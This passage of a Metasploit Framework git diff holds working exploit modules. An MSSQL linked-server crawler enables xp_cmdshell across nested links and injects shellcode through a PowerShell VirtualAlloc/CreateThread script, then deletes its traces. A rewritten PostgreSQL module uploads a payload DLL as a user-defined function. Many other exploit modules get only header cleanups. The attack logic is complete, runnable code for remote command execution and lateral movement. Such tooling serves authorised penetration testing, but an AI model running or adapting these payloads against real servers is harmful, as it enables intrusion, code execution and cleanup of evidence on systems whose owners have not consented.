masterList[0]["db_user"] = "" # User configured on the database server link + masterList[0]["db_sysadmin"] = "" # Specifies if the database user configured for the link has sysadmin privileges + masterList[0]["db_version"] = "" # Database version of the linked database server + masterList[0]["db_os"] = "" # OS of the linked database server + masterList[0]["path"] = [[]] # Link path used during crawl - all possible link paths stored + masterList[0]["done"] = 0 # Used to determine if linked need to be crawled + + shelled = Array.new # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system + + # Setup query for gathering information from database servers + versionQuery = "select @@servername,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE\ + (ltrim((select REPLACE((Left(@@Version,CHARINDEX('-',@@version)-1)),'Microsoft','')+ rtrim(CONVERT\ + (char(30), SERVERPROPERTY('Edition'))) +' '+ RTRIM(CONVERT(char(20), SERVERPROPERTY('ProductLevel')))+\ + CHAR(10))), CHAR(10), ''), CHAR(13), ''), CHAR(9), '')) as version, RIGHT(@@version, LEN(@@version)- 3 \ + -charindex (' ON ',@@VERSION)) as osver,is_srvrolemember('sysadmin'),(select count(srvname) from \ + master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server')as linkcount" + + # Create loot table to store configuration information from crawled database server links + linked_server_table = Rex::Ui::Text::Table.new( + 'Header' => 'Linked Server Table', + 'Ident' => 1, + 'Columns' => ['db_server', 'db_version', 'db_os', 'link_server', 'link_user', 'link_privilege', 'link_version', 'link_os','link_state'] + ) + save_loot = "" + + # Start crawling through linked database servers + while masterList.any? {|f| f["done"] == 0} + # Find the first DB server that has not been crawled (not marked as done) + server = masterList.detect {|f| f["done"] == 0} + + # Get configuration information from the database server + sql = query_builder(server["path"].first,"",0,versionQuery) + result = mssql_query(sql, false) if mssql_login_datastore + parse_results = result[:rows] + parse_results.each { |s| + server["name"] = s[0] + server["db_user"] = s[1] + server["db_sysadmin"] = s[5] + server["db_version"] = s[3] + server["db_os"] = s[4] + server["numlinks"] = s[6] + } + if masterList.length == 1 + print_good("Successfully connected to #{server["name"]}") + if datastore['VERBOSE'] == true + show_configs(server["name"],parse_results,true) + elsif server["db_sysadmin"] == 1 + print_good("Sysadmin on #{server["name"]}") + end + end + if server["db_sysadmin"] == 1 + enable_xp_cmdshell(server["path"].first,server["name"],shelled) + end + + # If links were found, determine if they can be connected to and add to crawl list + if (server["numlinks"] > 0) + # Enable loot + save_loot = "yes" + + # Select a list of the linked database servers that exist on the current database server + print_status("") + print_status("-------------------------------------------------") + print_status("Crawling links on #{server["name"]}...") + # Display number db server links + print_status("Links found: #{server["numlinks"]}") + print_status("-------------------------------------------------") + execute = "select srvname from master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server'" + sql = query_builder(server["path"].first,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + + result[:rows].each {|name| + name.each {|name| + + # Check if link works and if sysadmin permissions - temp array to save orig server[path] + temppath = Array.new + temppath = server["path"].first.dup + temppath << name + + # Get configuration information from the linked server + sql = query_builder(temppath,"",0,versionQuery) + result = mssql_query(sql, false) if mssql_login_datastore + + # Add newly aquired db servers to the masterlist, but don't add them if the link is broken or already exists + if result[:errors].empty? and result[:rows] != nil then + # Assign db query results to variables for hash + parse_results = result[:rows] + + # Add link server information to loot + link_status = 'up' + write_to_report(name,server,parse_results,linked_server_table,link_status) + + # Display link server information in verbose mode + if datastore['VERBOSE'] == true + show_configs(name,parse_results) + print_status(" o Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}") + else + if parse_results[0][5] == 1 + print_good("Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} (Sysadmin!)") + else + print_status("Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}") + end + end + + # Add link to masterlist hash + unless masterList.any? {|f| f["name"] == name} + masterList << add_host(name,server["path"].first,parse_results) + else + (0..masterList.length-1).each do |x| + if masterList[x]["name"] == name + masterList[x]["path"] << server["path"].first.dup + masterList[x]["path"].last << name + unless shelled.include?(name) + if parse_results[0][2]==1 + enable_xp_cmdshell(masterList[x]["path"].last.dup,name,shelled) + end + end + else + break + end + end + end + else + # Add to report + linked_server_table << [server["name"],server["db_version"],server["db_os"],name,'NA','NA','NA','NA','Connection Failed'] + + # Display status to user + if datastore['VERBOSE'] == true + print_status(" ") + print_error("Linked Server: #{name} ") + print_error(" o Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed") + print_status(" Failure could be due to:") + print_status(" - A dead server") + print_status(" - Bad credentials") + print_status(" - Nested open queries through SQL 2000") + else + print_error("Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed") + end + end + } + } + end + # Set server to "crawled" + server["done"]=1 + end + + print_status("-------------------------------------------------") + + # Setup table for loot + this_service = nil + if framework.db and framework.db.active + this_service = report_service( + :host => rhost, + :port => rport, + :name => 'mssql', + :proto => 'tcp' + ) + end + + # Display end time + time1 = Time.new + print_status("End time : #{time1.inspect}") + print_status("-------------------------------------------------") + + # Write log to loot / file + if (save_loot=="yes") + filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_linked_servers.csv" + path = store_loot("crawled_links", "text/plain", datastore['RHOST'], linked_server_table.to_csv, filename, "Linked servers",this_service) + print_status("Results have been saved to: #{path}") + end + end + + # --------------------------------------------------------------------- + # Method that builds nested openquery statements using during crawling + # --------------------------------------------------------------------- + def query_builder(path,sql,ticks,execute) + + # Temp used to maintain the original masterList[x]["path"] + temp = Array.new + path.each {|i| temp << i} + + # Actual query - defined when the function originally called - ticks multiplied + if path.length == 0 + return execute.gsub("'","'"*2**ticks) + + # openquery generator + else + sql = "select * from openquery(\"" + temp.shift + "\"," + "'"*2**ticks + query_builder(temp,sql,ticks+1,execute) + "'"*2**ticks + ")" + return sql + end + end + + # --------------------------------------------------------------------- + # Method that builds nested openquery statements using during crawling + # --------------------------------------------------------------------- + def query_builder_rpc(path,sql,ticks,execute) + + # Temp used to maintain the original masterList[x]["path"] + temp = Array.new + path.each {|i| temp << i} + + # Actual query - defined when the function originally called - ticks multiplied + if path.length == 0 + return execute.gsub("'","'"*2**ticks) + + # Openquery generator + else + exec_at = temp.shift + sql = "exec(" + "'"*2**ticks + query_builder_rpc(temp,sql,ticks+1,execute) + "'"*2**ticks +") at [" + exec_at + "]" + return sql + end + end + + # --------------------------------------------------------------------- + # Method for adding new linked database servers to the crawl list + # --------------------------------------------------------------------- + def add_host(name,path,parse_results) + + # Used to add new servers to masterList + server = Hash.new + server["name"] = name + temppath = Array.new + path.each {|i| temppath << i } + server["path"] = [temppath] + server["path"].first << name + server["done"] = 0 + parse_results.each {|stuff| + server["db_user"] = stuff.at(1) + server["db_sysadmin"] = stuff.at(2) + server["db_version"] = stuff.at(3) + server["db_os"] = stuff.at(4) + server["numlinks"] = stuff.at(6) + } + return server + end + + # --------------------------------------------------------------------- + # Method to display configuration information + # --------------------------------------------------------------------- + def show_configs(i,parse_results,entry=false) + + print_status(" ") + parse_results.each {|stuff| + + # Translate syadmin code + status = stuff.at(5) + if status == 1 then + dbpriv = "sysadmin" + else + dbpriv = "user" + end + + # Display database link information + if entry == false + print_status("Linked Server: #{i}") + print_status(" o Link user: #{stuff.at(1)}") + print_status(" o Link privs: #{dbpriv}") + print_status(" o Link version: #{stuff.at(3)}") + print_status(" o Link OS: #{stuff.at(4).strip}") + print_status(" o Links on server: #{stuff.at(6)}") + else + print_status("Server: #{i}") + print_status(" o Server user: #{stuff.at(1)}") + print_status(" o Server privs: #{dbpriv}") + print_status(" o Server version: #{stuff.at(3)}") + print_status(" o Server OS: #{stuff.at(4).strip}") + print_status(" o Server on server: #{stuff.at(6)}") + end + } + end + + # --------------------------------------------------------------------- + # Method for generating the report and loot + # --------------------------------------------------------------------- + def write_to_report(i,server,parse_results,linked_server_table,link_status) + parse_results.each {|stuff| + # Parse server information + db_link_user = stuff.at(1) + db_link_sysadmin = stuff.at(2) + db_link_version = stuff.at(3) + db_link_os = stuff.at(4) + + # Add link server to the reporting array and set link_status to 'up' + linked_server_table << [server["name"],server["db_version"],server["db_os"],i,db_link_user,db_link_sysadmin,db_link_version,db_link_os,link_status] + + return linked_server_table + } + end + + # --------------------------------------------------------------------- + # Method for enabling xp_cmdshell + # --------------------------------------------------------------------- + def enable_xp_cmdshell(path,name,shelled) + # Enables "show advanced options" and xp_cmdshell if needed and possible + # They cannot be enabled in user transactions (i.e. via openquery) + # Only enabled if RPC_Out is enabled for linked server + # All changes are reverted after payload delivery and execution + + # Check if "show advanced options" is enabled + execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'show advanced options'" + sql = query_builder(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + saoOrig = result[:rows].pop.pop + + # Check if "xp_cmdshell" is enabled + execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'" + sql = query_builder(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + xpcmdOrig = result[:rows].pop.pop + + # Try blindly to enable "xp_cmdshell" on the linked server + # Note: + # This only works if rpcout is enabled for all links in the link path. + # If that is not the case it fails cleanly. + if xpcmdOrig == 0 + if saoOrig == 0 + # Enabling show advanced options and xp_cmdshell + execute = "sp_configure 'show advanced options',1;reconfigure" + sql = query_builder_rpc(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + end + + # Enabling xp_cmdshell + print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable") + execute = "sp_configure 'xp_cmdshell',1;reconfigure" + sql = query_builder_rpc(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + end + + # Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.) + execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'" + sql = query_builder(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + xpcmdNow = result[:rows].pop.pop + + if xpcmdNow == 1 or xpcmdOrig == 1 + print_status("\t - Enabled xp_cmdshell on " + name) if xpcmdOrig == 0 + if datastore['DEPLOY'] + print_status("Ready to deploy a payload #{name}") + if datastore['DEPLOYLIST']=="" + datastore['DEPLOYLIST'] = nil + end + if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + print_status("\t - Checking if #{name} is on the deploy list...") + end + if datastore['DEPLOYLIST'] != nil + deploylist = datastore['DEPLOYLIST'].upcase.split(',') + end + if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase + if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + print_status("\t - #{name} is on the deploy list.") + end + unless shelled.include?(name) + powershell_upload_exec(path) + shelled << name + else + print_status("Payload already deployed on #{name}") + end + elsif datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + print_status("\t - #{name} is not on the deploy list") + end + end + else + print_error("\t - Unable to enable xp_cmdshell on " + name) + end + + # Revert soa and xp_cmdshell to original state + if xpcmdOrig == 0 and xpcmdNow == 1 + print_status("\t - Disabling xp_cmdshell on " + name) + execute = "sp_configure 'xp_cmdshell',0;reconfigure" + sql = query_builder_rpc(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + end + if saoOrig == 0 and xpcmdNow == 1 + execute = "sp_configure 'show advanced options',0;reconfigure" + sql = query_builder_rpc(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + end + end + + # ---------------------------------------------------------------------- + # Method that delivers shellcode payload via powershell thread injection + # ---------------------------------------------------------------------- + def powershell_upload_exec(path) + + # Create powershell script that will inject shell code from the selected payload + myscript ="$code = @\" +[DllImport(\"kernel32.dll\")] +public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); +[DllImport(\"kernel32.dll\")] +public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); +[DllImport(\"msvcrt.dll\")] +public static extern IntPtr memset(IntPtr dest, uint src, uint count); +\"@ +$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru +[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')} +$size = 0x1000 +if ($sc.Length -gt 0x1000) {$size = $sc.Length} +$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) +for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)} +$winFunc::CreateThread(0,0,$x,0,0,0)" + + # Unicode encode powershell script + mytext_uni = Rex::Text.to_unicode(myscript) + + # Base64 encode unicode + mytext_64 = Rex::Text.encode_base64(mytext_uni) + + # Generate random file names + rand_filename = rand_text_alpha(8) + var_duplicates = rand_text_alpha(8) + + # Write base64 encoded powershell payload to temp file + # This is written 2500 characters at a time due to xp_cmdshell ruby function limitations + # Also, line number tracking was added so that duplication lines caused by nested linked + # queries could be found and removed. + print_status("Deploying payload...") + linenum = 0 + mytext_64.scan(/.{1,2500}/).each {|part| + execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'" + sql = query_builder(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + linenum = linenum+1 + } + + # Remove duplicate lines from temp file and write to new file + execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'" + sql = query_builder(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + + # Remove tracking tags from lines + execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'" + sql = query_builder(path,"",0,execute) + result = mssql_query(sql, false) if mssql_login_datastore + + # Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors + # If running on 64bit system, 32bit powershell called from syswow64 + powershell_cmd = "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) -join '';if((gci env:processor_identifier).value -like\ + '*64*'){$psbits=\"#{datastore['POWERSHELL_PATH']} -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe\ + -noexit -noprofile -encodedCommand $dacode\"};iex $psbits" + powershell_uni = Rex::Text.to_unicode(powershell_cmd) + powershell_64 = Rex::Text.encode_base64(powershell_uni) + + # Setup query + execute = "select 1; EXEC master..xp_cmdshell 'powershell -EncodedCommand #{powershell_64}'" + sql = query_builder(path,"",0,execute) + + # Execute the playload + print_status("Executing payload...") + result = mssql_query(sql, false) if mssql_login_datastore + # Remove payload data from the target server + execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Remove-Item %TEMP%\\#{rand_filename}\";powershell -C \"Remove-Item %TEMP%\\#{var_duplicates}\"'" + sql = query_builder(path,"",0,execute) + result = mssql_query(sql,false) + end +end diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index b302b76f5a..5d01bde070 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -47,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # command stager mods ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # 'sa' password in logs diff --git a/modules/exploits/windows/mssql/mssql_payload_sqli.rb b/modules/exploits/windows/mssql/mssql_payload_sqli.rb index 3d3f4cb6f1..091ac967c8 100644 --- a/modules/exploits/windows/mssql/mssql_payload_sqli.rb +++ b/modules/exploits/windows/mssql/mssql_payload_sqli.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -64,7 +60,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Rodrigo Marcos' # SQL injection mods ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # 'sa' password in logs diff --git a/modules/exploits/windows/mysql/mysql_payload.rb b/modules/exploits/windows/mysql/mysql_payload.rb index 3cb74886ac..e21769fed9 100644 --- a/modules/exploits/windows/mysql/mysql_payload.rb +++ b/modules/exploits/windows/mysql/mysql_payload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -38,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote 'todb' # this Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # Bernardo's work with cmd exec via udf diff --git a/modules/exploits/windows/mysql/mysql_yassl_hello.rb b/modules/exploits/windows/mysql/mysql_yassl_hello.rb index f0f5c7b4ff..61503ae694 100644 --- a/modules/exploits/windows/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/windows/mysql/mysql_yassl_hello.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0226' ], diff --git a/modules/exploits/windows/nfs/xlink_nfsd.rb b/modules/exploits/windows/nfs/xlink_nfsd.rb index c1b509eba4..e82a00372a 100644 --- a/modules/exploits/windows/nfs/xlink_nfsd.rb +++ b/modules/exploits/windows/nfs/xlink_nfsd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote to execute arbitrary code. }, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5780' ], diff --git a/modules/exploits/windows/nntp/ms05_030_nntp.rb b/modules/exploits/windows/nntp/ms05_030_nntp.rb index 71abe29239..9029e420eb 100644 --- a/modules/exploits/windows/nntp/ms05_030_nntp.rb +++ b/modules/exploits/windows/nntp/ms05_030_nntp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-1213' ], diff --git a/modules/exploits/windows/novell/groupwisemessenger_client.rb b/modules/exploits/windows/novell/groupwisemessenger_client.rb index 48162aec8c..ecfaf7df9a 100644 --- a/modules/exploits/windows/novell/groupwisemessenger_client.rb +++ b/modules/exploits/windows/novell/groupwisemessenger_client.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2703' ], diff --git a/modules/exploits/windows/novell/nmap_stor.rb b/modules/exploits/windows/novell/nmap_stor.rb index 4b2f4c35cd..517a656f2d 100644 --- a/modules/exploits/windows/novell/nmap_stor.rb +++ b/modules/exploits/windows/novell/nmap_stor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6424' ], diff --git a/modules/exploits/windows/novell/zenworks_desktop_agent.rb b/modules/exploits/windows/novell/zenworks_desktop_agent.rb index f9c6915ad8..d0ab3f9384 100644 --- a/modules/exploits/windows/novell/zenworks_desktop_agent.rb +++ b/modules/exploits/windows/novell/zenworks_desktop_agent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Unknown' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-1543'], diff --git a/modules/exploits/windows/oracle/osb_ndmp_auth.rb b/modules/exploits/windows/oracle/osb_ndmp_auth.rb index 364c1e7c21..09350c3b7a 100644 --- a/modules/exploits/windows/oracle/osb_ndmp_auth.rb +++ b/modules/exploits/windows/oracle/osb_ndmp_auth.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5444' ], diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index f35daf337c..e569457ef6 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0499' ], diff --git a/modules/exploits/windows/oracle/tns_auth_sesskey.rb b/modules/exploits/windows/oracle/tns_auth_sesskey.rb index 8cd9ef66a7..eb3009f95c 100644 --- a/modules/exploits/windows/oracle/tns_auth_sesskey.rb +++ b/modules/exploits/windows/oracle/tns_auth_sesskey.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1979'], diff --git a/modules/exploits/windows/oracle/tns_service_name.rb b/modules/exploits/windows/oracle/tns_service_name.rb index 2d8049714d..a8ec9538a0 100644 --- a/modules/exploits/windows/oracle/tns_service_name.rb +++ b/modules/exploits/windows/oracle/tns_service_name.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-0965'], diff --git a/modules/exploits/windows/pop3/seattlelab_pass.rb b/modules/exploits/windows/pop3/seattlelab_pass.rb index bcefab085e..53f39f6a5b 100644 --- a/modules/exploits/windows/pop3/seattlelab_pass.rb +++ b/modules/exploits/windows/pop3/seattlelab_pass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -50,7 +46,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'stinko', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2003-0264'], diff --git a/modules/exploits/windows/postgres/postgres_payload.rb b/modules/exploits/windows/postgres/postgres_payload.rb index 746de7703e..19e722cd08 100644 --- a/modules/exploits/windows/postgres/postgres_payload.rb +++ b/modules/exploits/windows/postgres/postgres_payload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -11,29 +7,29 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Postgres - include Msf::Exploit::CmdStagerVBS + include Msf::Auxiliary::Report + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper # Creates an instance of this module. def initialize(info = {}) super(update_info(info, 'Name' => 'PostgreSQL for Microsoft Windows Payload Execution', 'Description' => %q{ - This module creates and enables a custom UDF (user defined function) on the - target host via the UPDATE pg_largeobject method of binary injection. On - default Microsoft Windows installations of PostgreSQL (=< 8.4), the postgres - service account may write to the Windows temp directory, and may source - UDF DLL's from there as well. + On default Microsoft Windows installations of PostgreSQL the postgres + service account may write to the current directory (which is usually + "C:\Program Files\PostgreSQL\\data" where is the + major.minor version of PostgreSQL). UDF DLL's may be sourced from + there as well. - PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are - valid targets for this module. - - NOTE: This module will leave a payload executable on the target system when the - attack is finished, as well as the UDF DLL and the OID. + This module uploads a Windows DLL file via the pg_largeobject method + of binary injection and creates a UDF (user defined function) from + that DLL. Because the payload is run from DllMain, it does not need to + conform to specific Postgres API versions. }, 'Author' => [ @@ -41,18 +37,17 @@ class Metasploit3 < Msf::Exploit::Remote 'todb' # this Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ - [ 'URL', 'http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf', - 'URL', 'http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql' # A litte more specific to PostgreSQL - ] + [ 'URL', 'http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf', ], + [ 'URL', 'http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql' ], # A litte more specific to PostgreSQL ], 'Platform' => 'win', 'Targets' => - [ - [ 'Automatic', { } ], # Confirmed on XXX - ], + [ + [ 'Windows x86', { 'Arch' => ARCH_X86 } ], + [ 'Windows x86_64', { 'Arch' => ARCH_X86_64 } ], + ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 10 2009' # Date of Bernardo's BH Europe paper. )) @@ -60,83 +55,78 @@ class Metasploit3 < Msf::Exploit::Remote deregister_options('SQL', 'RETURN_ROWSET') end - # Buncha stuff to make typing easier. - def username; datastore['USERNAME']; end - def password; datastore['PASSWORD']; end - def database; datastore['DATABASE']; end - def verbose; datastore['VERBOSE']; end - def rhost; datastore['RHOST']; end - def rport; datastore['RPORT']; end + def check + version = postgres_fingerprint - def execute_command(cmd, opts) - postgres_sys_exec(cmd) + if version[:auth] + print_status "Authentication successful. Version: #{version}" + return CheckCode::Vulnerable + else + print_error "Authentication failed. #{version[:preauth] || version[:unknown]}" + return CheckCode::Safe + end end def exploit - version = get_version(username,password,database,verbose) + version = do_login(username,password,database) case version - when :nocompat; print_error "Authentication successful, but not a compatable version." - when :noauth; print_error "Authentication failed." - when :noconn; print_error "Connection failed." + when :noauth; print_error "Authentication failed."; return + when :noconn; print_error "Connection failed."; return + else + print_status("#{rhost}:#{rport} - #{version}") end - return unless version =~ /8\.[234]/ - print_status "Authentication successful and vulnerable version #{version} on Windows confirmed." - tbl,fld,dll,oid = postgres_upload_binary_file(dll_fname(version)) - unless tbl && fld && dll && oid + + fname = "#{Rex::Text.rand_text_alpha(8)}.dll" + register_files_for_cleanup(fname) + + unless postgres_upload_binary_data(generate_payload_dll, fname) print_error "Could not upload the UDF DLL" return end - print_status "Uploaded #{dll} as OID #{oid} to table #{tbl}(#{fld})" - ret_sys_exec = postgres_create_sys_exec(dll) - if ret_sys_exec - if @postgres_conn - execute_cmdstager({:linemax => 1500, :nodelete => true, :temp=>"."}) - handler - postgres_logout if @postgres_conn - else - print_error "Lost connection." - return - end + + print_status "Uploaded as #{fname}" + begin + func_name = Rex::Text.rand_text_alpha(10) + postgres_query( + "create or replace function pg_temp.#{func_name}()"+ + " returns void as '#{fname}','#{func_name}'"+ + " language c strict immutable" + ) + rescue RuntimeError => e + print_error "Failed to create UDF function: #{e.class}: #{e}" end postgres_logout if @postgres_conn + end - def dll_fname(version) - File.join(Msf::Config.install_root,"data","exploits","postgres",version,"lib_postgresqludf_sys.dll") - end - - # A shorter version of do_fingerprint from the postgres_version scanner - # module, specifically looking for versions that valid targets for this - # module. - def get_version(user=nil,pass=nil,database=nil,verbose=false) + # Authenticate to the postgres server. + # + # Returns the version from #postgres_fingerprint + def do_login(user=nil,pass=nil,database=nil) begin - msg = "#{rhost}:#{rport} Postgres -" password = pass || postgres_password - vprint_status("Trying username:'#{user}' with password:'#{password}' against #{rhost}:#{rport} on database '#{database}'") + vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}") result = postgres_fingerprint( :db => database, :username => user, :password => password ) if result[:auth] - # So, the only versions we have DLL binaries for are PostgreSQL 8.2, 8.3, and 8.4 - # This also checks to see if it was compiled with a windows-based compiler -- - # the stock Postgresql downloads are Visual C++ for 8.4 and 8.3, and GCC for mingw) - # Also, the method to write files to disk doesn't appear to work on 9.0, so - # tabling that version for now. - if result[:auth] =~ /PostgreSQL (8\.[234]).*(Visual C\+\+|mingw|cygwin)/i - return $1 - else - print_status "Found #{result[:auth]}" - return :nocompat - end + report_service( + :host => rhost, + :port => rport, + :name => "postgres", + :info => result.values.first + ) + return result[:auth] else + print_status("Login failed, fingerprint is #{result[:preauth] || result[:unknown]}") return :noauth end - rescue Rex::ConnectionError - vprint_error 